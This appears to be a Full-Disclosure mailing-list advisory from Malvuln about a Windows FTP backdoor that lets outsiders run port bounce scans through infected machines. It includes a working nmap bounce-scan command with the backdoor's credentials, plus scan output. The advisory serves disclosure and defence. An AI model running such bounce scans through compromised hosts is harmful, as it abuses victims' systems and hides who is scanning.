lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 7 Apr 2022 00:11:46 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.FTP.Lana.01.d / Port Bounce Scan

Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source:
https://malvuln.com/advisory/ea9ab5983a6fa71e31907e74d4ddbab6_B.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.FTP.Lana.01.d
Vulnerability: Port Bounce Scan
Description: The malware listens on TCP port 9003. Third-party intruders
who successfully logon can abuse the backdoor FTP server as a
man-in-the-middle machine allowing PORT Command bounce scan attacks using
Nmap. This vulnerability allows remote attackers to abuse your system and
discreetly conduct network port scanning. Victims will then think these
scans are originating from the infected system running the afflicted
malware FTP Server and not you.
Family: Lana
Type: PE32
MD5: ea9ab5983a6fa71e31907e74d4ddbab6
Vuln ID: MVID-2022-0540
Dropped files: sersvc32.exe
Disclosure: 04/06/2022

Exploit/PoC:
C:\>nmap -n -Pn -b admin:secret@....168.18.125:9003 -p21,22,80
192.168.18.237 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-04 14:30 UTC-11
Resolved FTP bounce attack proxy to 192.168.18.125 (192.168.18.125).
Attempting connection to ftp://admin:secret@....168.18.125:9003
Connected:220 Silver FTP v1.1
Login credentials accepted by FTP server!
Initiating Bounce Scan at 14:30
Discovered open port 80/tcp on 192.168.18.237
Completed Bounce Scan at 14:30, 2.12s elapsed (3 total ports)
Nmap scan report for 192.168.18.237
Host is up.

PORT   STATE  SERVICE
21/tcp closed ftp
22/tcp closed ssh
80/tcp open   http

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 11.23 seconds

Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ